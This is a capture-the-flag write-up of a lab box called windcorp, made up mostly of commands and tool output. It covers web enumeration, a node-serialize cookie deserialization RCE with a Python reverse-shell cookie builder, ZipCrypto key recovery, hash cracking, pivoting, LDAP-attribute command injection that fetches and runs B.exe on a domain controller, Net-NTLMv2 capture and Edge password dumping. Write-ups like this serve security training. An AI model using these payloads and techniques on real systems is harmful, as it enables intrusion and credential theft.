Scanning

> TARGET=10.129.43.131 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON          VERSION
22/tcp open  ssh     syn-ack ttl 127 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    syn-ack ttl 127 nginx 1.18.0
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0

Web Enum

  • Simple curl to check headers and basics
> curl -i http://10.129.43.131
  • The response references the domain www.windcorp.htb; add windcorp.htb and www.windcorp.htb to /etc/hosts
  • Subdomain (vhost) enum through the Host header; a hit is a response whose size differs from the default vhost (hide the baseline size with --hh if the default answer is noisy)
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://windcorp.htb/" -H "Host: FUZZ.windcorp.htb"

000000048:   403        43 L     162 W      2436 Ch     "portal"
  • dirsearch (everything under /login/ comes back as the same 1KB page at the same instant, so those hits are one catch-all route, not separate files)
> dirsearch -u http://portal.windcorp.htb/

[16:36:23] 301 -  183B  - /3rdparty  ->  /3rdparty/                         
[16:36:28] 200 -  479B  - /About                                            
[16:36:28] 200 -  479B  - /about
[16:37:21] 301 -  173B  - /css  ->  /css/                                   
[16:37:41] 301 -  179B  - /images  ->  /images/                             
[16:37:51] 200 -    1KB - /login                                            
[16:37:52] 200 -    1KB - /login/admin/admin.asp                            
[16:37:52] 200 -    1KB - /login/admin/
[16:37:52] 200 -    1KB - /login/cpanel/
[16:37:52] 200 -    1KB - /login/cpanel.aspx
[16:37:52] 200 -    1KB - /login/
[16:37:52] 200 -    1KB - /login/administrator/
[16:37:52] 200 -    1KB - /login/cpanel.html
[16:37:52] 200 -    1KB - /login/cpanel.php
[16:37:52] 200 -    1KB - /login/cpanel.jsp
[16:37:52] 200 -    1KB - /login/cpanel.js
[16:37:52] 200 -    1KB - /login/super
[16:37:52] 200 -    1KB - /login/index
[16:37:52] 200 -    1KB - /login/login                                      
[16:37:52] 200 -    1KB - /login/oauth/                                     
[16:37:53] 302 -   23B  - /logout  ->  /                                    
[16:37:53] 302 -   23B  - /logout/  ->  /
  • Check common credentials on http://portal.windcorp.htb: admin:admin is valid
  • Re-run dirsearch with the session cookie (403s hidden); nothing new turns up
> dirsearch -u http://portal.windcorp.htb/ --cookie="profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2NjI4NTIxNDUwMjJ9" -x 403

[19:25:45] 301 -  183B  - /3rdparty  ->  /3rdparty/
[19:25:50] 200 -  479B  - /About
[19:25:50] 200 -  479B  - /about
[19:26:47] 301 -  173B  - /css  ->  /css/
[19:27:09] 301 -  179B  - /images  ->  /images/
  • When fuzzing after login, the WAF blocks the default tool User-Agent, so send a browser User-Agent together with both the app and profile cookies; -fr "Cannot find" drops the catch-all response and -fs 1066 the other constant-size page
> ffuf -w /usr/share/wordlists/dirb/big.txt -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "Cookie: app=s%3A_BLNafoAK_5b8D901vyGdLFtnsyKI5hg.dY63I4%2BEefs9MO7vtDy0qisolrtlFJ27X%2BmDcN0OU4o; profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2NjI5MzgzNDI5NDZ9" -X GET -u http://portal.windcorp.htb/FUZZ -mc all -fr "Cannot find" -fs 1066 -c

3rdparty                [Status: 301, Size: 183, Words: 7, Lines: 11, Duration: 305ms]
About                   [Status: 200, Size: 479, Words: 23, Lines: 1, Duration: 488ms]
Login                   [Status: 200, Size: 1134, Words: 54, Lines: 1, Duration: 821ms]
about                   [Status: 200, Size: 479, Words: 23, Lines: 1, Duration: 450ms]
css                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 632ms]
images                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 378ms]
login                   [Status: 200, Size: 1134, Words: 54, Lines: 1, Duration: 417ms]
logout                  [Status: 302, Size: 23, Words: 4, Lines: 1, Duration: 896ms]
stylesheets             [Status: 301, Size: 189, Words: 7, Lines: 11, Duration: 400ms]
  • A basic XSS probe in the path returns a WAF block page instead of the application's response, so anything sent to the app has to get past ModSecurity
> http://portal.windcorp.htb/%3Cscript%3Eprompt(1)%3C/script%3E

You’ve been blocked for security reasons
If you believe this is a mistake, please contact the website owner
and include the request ID number from this page.
Request ID: c0da38c0c62d7efd Sat Sep 10 2022 20:13:55 GMT-0400 (Eastern Daylight Time)
This site is protected by ModSecurity

shell: webster

  • The profile cookie is plain base64 JSON ({"username":"admin","admin":"1","logon":...}) with no signature, and the server deserializes it rather than JSON-parsing it: _$$ND_FUNC$$_ is node-serialize's function marker, a string value starting with it is eval()'d as a function, and a trailing () turns it into an IIFE that runs during deserialization. Confirm blind with an out-of-band request to a listener you control:
> curl -i --cookie "app=$cookie_app;profile=$(echo '{"username":"_$$ND_FUNC$$_function(){require(\"child_process\").exec(\"curl http://<ip>\", function(error,stdout, stderr) { console.log(stdout) });}()"}'|base64 -w0)=<original_cookie>" 'http://portal.windcorp.htb/'
  • Generate the reverse-shell body with nodejsshell.py (it emits the shell as eval(String.fromCharCode(...)), so no quotes or backslashes are needed inside the cookie JSON); start nc -lvnp 4444 first
> python2 nodejsshell.py <ip> 4444
  • Final cookie: the generated eval(...) replaces the function body
> curl -i --cookie "app=$cookie_app;profile=$(echo '{"username":"_$$ND_FUNC$$_function(){eval(String.fromCharCode(10,......59,10))}()"}'|base64 -w0)=<original_cookie>" 'http://portal.windcorp.htb/'
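The cookie construction above, as an added example (not part of the original notes or of nodejsshell.py): decode the original profile cookie, encode a JavaScript body the way nodejsshell.py does, and wrap it in the node-serialize IIFE. The reverse-shell body, the listener address 10.10.14.9:4444 and the field name "username" are assumptions for the demo; the app's real cookie name and the _$$ND_FUNC$$_ marker are from the page.

```python
import base64
import json

# node-serialize's marker for serialized functions: on unserialize() any string
# value that starts with it is eval()'d, and a trailing "()" makes it an IIFE
# that executes while the cookie is being deserialized.
FUNC_FLAG = "_$$ND_FUNC$$_"


def decode_profile_cookie(value: str) -> dict:
    """Decode the base64 JSON profile cookie (re-adds padding a browser may strip)."""
    value += "=" * (-len(value) % 4)
    return json.loads(base64.b64decode(value))


def js_to_fromcharcode(js_src: str) -> str:
    """Encode JS source as eval(String.fromCharCode(...)) so that no quote or
    backslash from the payload ever appears inside the cookie JSON."""
    codes = ",".join(str(ord(ch)) for ch in js_src)
    return f"eval(String.fromCharCode({codes}))"


def build_profile_cookie(js_body: str, field: str = "username") -> str:
    """Wrap js_body in the IIFE node-serialize evaluates and base64 the JSON."""
    iife = f"{FUNC_FLAG}function(){{{js_body}}}()"
    raw = json.dumps({field: iife}, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


def reverse_shell_js(lhost: str, lport: int) -> str:
    """Minimal Node reverse shell (assumed shape; nodejsshell.py emits its own)."""
    return (
        "var n=require('net'),c=require('child_process'),s=c.spawn('/bin/sh',[]);"
        f"var k=new n.Socket();k.connect({lport},'{lhost}',function(){{"
        "k.pipe(s.stdin);s.stdout.pipe(k);s.stderr.pipe(k);});"
    )


def reverse_shell_cookie(lhost: str, lport: int) -> str:
    """Full profile cookie value carrying the encoded reverse shell."""
    return build_profile_cookie(js_to_fromcharcode(reverse_shell_js(lhost, lport)))


if __name__ == "__main__":
    # The admin cookie captured on the page: nothing but base64 JSON.
    print(decode_profile_cookie(
        "eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2NjI4NTIxNDUwMjJ9"))
    # Assumed listener; send as the profile= cookie alongside the app= cookie.
    print(reverse_shell_cookie("10.10.14.9", 4444))
```

The fix on the server side is to stop calling unserialize() on attacker-controlled input (JSON.parse never evaluates strings) and to sign the cookie so it cannot be edited in the first place.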

cracking the zip

  • backup.zip under /home/webster is password protected (ZipCrypto)
  • Download it locally and try fcrackzip with rockyou: no hit
> fcrackzip -D -u -p '/usr/share/wordlists/rockyou.txt' backup.zip
# the archive contains a copy of this box's etc/passwd, and ZipCrypto falls to a
# known-plaintext attack given at least 12 bytes of plaintext; zip the live file
# as the plaintext archive
> cp /etc/passwd . && zip passwd.zip passwd

# bkcrack recovers the three 32-bit internal keys (-C/-c cipher archive and entry,
# -P/-p plaintext archive and entry)
> ./bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd
d6829d8d 8514ff97 afc3f825

# with the keys, write a copy of the archive encrypted under a password of our
# choosing (meow); the original password is never needed
> ./bkcrack -C backup.zip -U unlocked.zip meow -k d6829d8d 8514ff97 afc3f825
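Why bkcrack can re-encrypt the archive under a new password without ever learning the old one, as an added example (not from the original notes or from bkcrack): a pure-Python ZipCrypto implementation following APPNOTE.TXT. The password, the entry content and the 12-byte header are constructed for the demo; the key-recovery step itself (the Biham-Kocher attack bkcrack implements) is not reproduced here. The point is that the three 32-bit keys are the entire secret, which is exactly what bkcrack's -k option consumes.

```python
import os
import zlib

# ZipCrypto ("traditional PKWARE encryption") key schedule and stream cipher.
INITIAL_KEYS = (0x12345678, 0x23456789, 0x34567890)
HEADER_LEN = 12  # random bytes prepended to every encrypted entry


def _crc32_step(crc: int, byte: int) -> int:
    # One CRC-32 table step without the pre/post inversion zlib applies.
    return zlib.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


def update_keys(keys: list, byte: int) -> None:
    """Advance the 96-bit key state with one plaintext byte (APPNOTE update_keys)."""
    keys[0] = _crc32_step(keys[0], byte)
    keys[1] = (keys[1] + (keys[0] & 0xFF)) & 0xFFFFFFFF
    keys[1] = (keys[1] * 134775813 + 1) & 0xFFFFFFFF
    keys[2] = _crc32_step(keys[2], keys[1] >> 24)


def keys_from_password(password: bytes) -> list:
    """The password only seeds the key state; after this it is never used again."""
    keys = list(INITIAL_KEYS)
    for b in password:
        update_keys(keys, b)
    return keys


def keystream_byte(keys: list) -> int:
    t = (keys[2] | 2) & 0xFFFF
    return ((t * (t ^ 1)) >> 8) & 0xFF


def encrypt_entry(password: bytes, plaintext: bytes, header: bytes = None) -> bytes:
    """Encrypt one archive entry: 12 header bytes followed by the data."""
    header = header or os.urandom(HEADER_LEN)
    keys = keys_from_password(password)
    out = bytearray()
    for p in header + plaintext:
        out.append(p ^ keystream_byte(keys))
        update_keys(keys, p)
    return bytes(out)


def decrypt_with_keys(keys: list, ciphertext: bytes) -> bytes:
    """Decrypt from the internal key state alone (what `bkcrack -k k0 k1 k2` does)."""
    keys = list(keys)  # work on a copy, the caller's keys stay usable
    out = bytearray()
    for c in ciphertext:
        p = c ^ keystream_byte(keys)
        update_keys(keys, p)
        out.append(p)
    return bytes(out[HEADER_LEN:])


def decrypt_with_password(password: bytes, ciphertext: bytes) -> bytes:
    return decrypt_with_keys(keys_from_password(password), ciphertext)


def change_password(keys: list, ciphertext: bytes, new_password: bytes) -> bytes:
    """Rewrite an entry under a new password without knowing the old one
    (the `bkcrack -U unlocked.zip meow` step): decrypt with keys, re-encrypt."""
    return encrypt_entry(new_password, decrypt_with_keys(keys, ciphertext))


if __name__ == "__main__":
    # Constructed stand-in for the etc/passwd entry inside backup.zip.
    passwd = b"root:x:0:0:root:/root:/bin/bash\nwebster:x:1000:1000::/home/webster:/bin/bash\n"
    ct = encrypt_entry(b"backup-password-we-never-learn", passwd)
    recovered = keys_from_password(b"backup-password-we-never-learn")  # bkcrack's output
    print([hex(k) for k in recovered])
    print(decrypt_with_password(b"meow", change_password(recovered, ct, b"meow")) == passwd)
```

Because the keystream depends only on the evolving key state, 12 or more bytes of known plaintext fix enough of that state for bkcrack to search the rest; a modern archive should use AES (WinZip AE-2 or 7z) instead of ZipCrypto.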
  • Inside the unlocked archive, var/lib/sss/db/cache_windcorp.htb.ldb is the SSSD credential cache; it stores the cached domain password as a sha512crypt hash, and strings pulls out the account and hash
> strings var/lib/sss/db/cache_windcorp.htb.ldb

Ray.Duncan@WINDCORP.HTB
$6$nHb338EAa7BAeuR0$MFQjz2.B688LXEDsx035.Nj.CIDbe/u98V3mLrMhDHiAsh89BX9ByXoGzcXnPXQQF/hAj5ajIsm0zB.wg2zX81
  • The hash is sha512crypt ($6$) and cracks with john (default wordlist mode)
> john hash.txt

pantera

user flag: ray.duncan to root

  • Log in over ssh as ray.duncan; SSSD uses fully qualified names here, so the login name is ray.duncan@windcorp.htb
> ssh 'ray.duncan@windcorp.htb'@10.10.11.179

ray.duncan@windcorp.htb@webserver:/$ id
uid=1069003229(ray.duncan@windcorp.htb) gid=1069000513(domain users@windcorp.htb) groups=1069000513(domain users@windcorp.htb),1069003601(development@windcorp.htb)
  • Kerberos ksu for PE: kinit obtains a TGT for ray.duncan, and ksu (setuid root) switches to root because its authorization step accepts that principal (controlled by root's .k5login/.k5users)
ray.duncan@windcorp.htb@webserver:/$ kinit ray.duncan
Password for ray.duncan@WINDCORP.HTB: 

ray.duncan@windcorp.htb@webserver:/$ ksu 
Authenticated ray.duncan@WINDCORP.HTB
Account root: authorization for ray.duncan@WINDCORP.HTB successful
Changing uid to root (0)

root@webserver:/# id
uid=0(root) gid=0(root) groups=0(root)
  • Earlier, linpeas showed iptables OUTPUT rules that DROP new connections to 192.168.0.0/24 unless the socket is owned by root (-m owner ! --uid-owner root), which is why pivoting failed from the webster shell; as root the rule no longer matches and the internal network is reachable
[+] Iptables rules
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m multiport --dports 53,80,88,443 -m state --state NEW -j ACCEPT
-A OUTPUT -p udp -m multiport --dports 53,88,123 -m state --state NEW -j ACCEPT
-A OUTPUT -p icmp -m comment --comment "Allow Ping to work as expected" -j ACCEPT
-A OUTPUT -d 192.168.0.0/24 -m owner ! --uid-owner root -m state --state NEW -j DROP
COMMIT

root@webserver:~/.ssh# nc -vn 192.168.0.2 389
(UNKNOWN) [192.168.0.2] 389 (ldap) open
  • dig shows hope.windcorp.htb with two A records, the internal 192.168.0.2 and the external 10.10.11.179; 192.168.0.2 is the next target
hope.windcorp.htb.      3600    IN      A       192.168.0.2
hope.windcorp.htb.      3600    IN      A       10.10.11.179
  • Scan 192.168.0.2 from the compromised container (no nmap there); nc -z reports open ports on stderr, hence the redirect. 3268/3269 are LDAP global catalog, 5985 WinRM and 9389 AD Web Services, i.e. a Windows domain controller
> for p in {1..65535}; do nc -vn 192.168.0.2 $p -w 1 -z & done 2> output.txt

(UNKNOWN) [192.168.0.2] 22 (ssh) open
(UNKNOWN) [192.168.0.2] 53 (domain) open
(UNKNOWN) [192.168.0.2] 80 (http) open
(UNKNOWN) [192.168.0.2] 88 (kerberos) open
(UNKNOWN) [192.168.0.2] 389 (ldap) open
(UNKNOWN) [192.168.0.2] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.2] 464 (kpasswd) open
(UNKNOWN) [192.168.0.2] 3268 (?) open
(UNKNOWN) [192.168.0.2] 3269 (?) open
(UNKNOWN) [192.168.0.2] 5985 (?) open
(UNKNOWN) [192.168.0.2] 9389 (?) open
(UNKNOWN) [192.168.0.2] 49664 (?) open
(UNKNOWN) [192.168.0.2] 51648 (?) open
(UNKNOWN) [192.168.0.2] 58219 (?) open
(UNKNOWN) [192.168.0.2] 64610 (?) open

Setup pivot

  • Upload chisel to the compromised container and open a reverse SOCKS tunnel; kali then reaches 192.168.0.0/24 through proxychains
# on kali
# update /etc/proxychains4.conf 
socks5 127.0.0.1 1080
> ./chisel server -p 9999 --reverse

# on target
> ./chisel client --max-retry-count=1 -v 10.10.14.9:9999 R:1080:socks

Access smb share

  • From kali (through the proxy), request a Kerberos service ticket for cifs/hope.windcorp.htb with ray.duncan's password (a regular TGS request, not a forged silver ticket) and use it for SMB. hope.windcorp.htb must resolve to 192.168.0.2 (e.g. /etc/hosts) because the ticket is bound to that SPN host name
# request ticket
> proxychains getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/ray.duncan:pantera'
> export KRB5CCNAME=ray.duncan.ccache

# connect to smb with the ticket
> proxychains smbclient.py ray.duncan@hope.windcorp.htb -k -no-pass
  • Browse for contents
# use WC-Share
...
drw-rw-rw-          0  Fri Sep 16 04:26:58 2022 .
drw-rw-rw-          0  Mon May  2 06:33:07 2022 ..
-rw-rw-rw-         88  Fri Sep 16 04:26:58 2022 debug-users.txt

# cat debug-users.txt                                                  
IvanJennings43235345
MiriamMills93827637
BenjaminHernandez23232323
RayDuncan9342211

RCE on hope

  • Dump the directory over LDAP with Kerberos auth (-Y GSSAPI needs a TGT in the cache, i.e. kinit as ray.duncan, not just the cifs service ticket)
> ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'DC=windcorp,DC=htb' > ldapinfo.txt
  • ray.duncan can write his own mobile attribute, and a job on hope runs a command with that value unsanitized: a value of the form ;<cmd> executes <cmd> as PowerShell on the DC. Example: fetch a file into the share we can read.
# create a mod.ldif
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;wget http://10.10.14.173/file -O c:\wc-share\file;

# then send to modify the ldap record
> ldapmodify -Y GSSAPI -H ldap://windcorp.htb -D "CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb" -f mod.ldif
  • Verify the change, then wait for the job (it runs about every 2 minutes) and watch for the request from hope. The mobile attribute is limited to 64 characters, so keep each value short and stage anything longer through a downloaded file
> ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb'
  • hope enforces AppLocker; pull the effective policy to the share the same way. The default path rule lets Everyone run anything under %WINDIR%\* except the listed exceptions, so a user-writable directory under C:\Windows that is not excepted, such as C:\Windows\debug\wia, is the place to drop a binary
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;Get-AppLockerPolicy -Effective -Xml > c:\wc-share\u
<FilePathRule Id="2c47f772-4d79-4493-b64b-613e17f0011c" Name="All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow">
    <Conditions>
        <FilePathCondition Path="%WINDIR%\*" />
    </Conditions>
    <Exceptions>
        ...
    </Exceptions>
# drop the reverse shell (B.exe, with AMSI bypass) into the allowed path; if PowerShell
# rejects -O as ambiguous, spell it -OutFile and shorten the path to stay within 64 chars
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;wget http://10.10.14.9/B.exe -O C:\windows\debug\wia\B.exe

# run it
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;Start-Process -FilePath C:\windows\debug\wia\B.exe
  • B.exe calls back and we land on the DC as scriptrunner, the account the job runs as

PE: bob.wood

  • Upload winPEAS to the same writable path and collect info; NTLM is still accepted (NTLMv2 only), so making the DC authenticate to a host we control yields a Net-NTLMv2 response to crack
> wget http://10.10.14.51/winPEASx64.exe -O c:\windows\debug\wia\winPEASx64.exe

LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)
# on webserver (the compromised container; hope reaches it as webserver.windcorp.htb)
> ./smbserver MEOW . -smb2support
  • Use the following ldif to make the job on the DC open our SMB share (or run the cd directly from the scriptrunner shell)
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: ;cd \\webserver.windcorp.htb\MEOW\
  • Wait for the callback: the client first offers Kerberos, which smbserver rejects, then falls back to NTLM and sends the Net-NTLMv2 response
root@webserver:~# ./smbserver MEOW . -smb2support
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,64447)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*] User HOPE\scriptrunner authenticated successfully
[*] scriptrunner::WINDCORP:4141414141414141:f22b7ec10c6593b3649ddaea047a7981:...
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (192.168.0.2,64447)
[*] Remaining connections []
  • Crack the Net-NTLMv2 hash with hashcat (mode 5600); the same password is reused by bob.wood
> hashcat -m 5600 hash.txt rockyou.txt

!@p%i&J#iNNo1T2
  • Run commands as bob.wood through a loopback PSRemoting session (New-PSSession without -ComputerName targets the local machine, and bob.wood is allowed to PSRemote to the DC); start another nc listener first. B.exe is the reverse shell with AMSI bypass uploaded earlier.
$SecPassword = ConvertTo-SecureString '!@p%i&J#iNNo1T2' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('bob.wood', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\windows\debug\wia\B.exe }

PE: administrator

  • Upload SharpHound and collect data again: bob.wood is a member of IT, which has PSRemote rights to the DC, but going further needs a domain admin (e.g. bob.woodadm). It is reasonable to assume bob.wood uses the same machine to log in as bob.woodadm for administrative work, so the browser profile is worth searching
  • bob.woodadm's credential is saved in Edge: C:\users\bob.wood\appdata\local\microsoft\edge\user data\default\Login Data
  • Decrypt it with https://github.com/moonD4rk/HackBrowserData; it has to run in bob.wood's context, because the Edge encryption key in Local State is DPAPI-protected for that user
PS C:\windows\debug\wia> .\hbd.exe
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_password.csv success

PS C:\windows\debug\wia> cat results/microsoft_edge_default_password.csv
UserName,Password,LoginURL,CreateDate
bob.woodADM@windcorp.com,smeT-Worg-wer-m024,http://webmail.windcorp.com/login.html,2022-07-04T18:46:59.133335+02:00
bob.wood@windcorp.htb,SomeSecurePasswordIGuess!09,http://google.com/login.html,2022-07-04T18:14:00.217981+02:00
bob.wood@windcorp.htb,SemTro?32756Gff,http://somewhere.com/login.html,2022-07-04T18:12:42.849216+02:00
  • Log in as bob.woodADM the same way (loopback session, new listener) and read the root flag
$SecPassword = ConvertTo-SecureString 'smeT-Worg-wer-m024' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('bob.woodADM', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\windows\debug\wia\B.exe }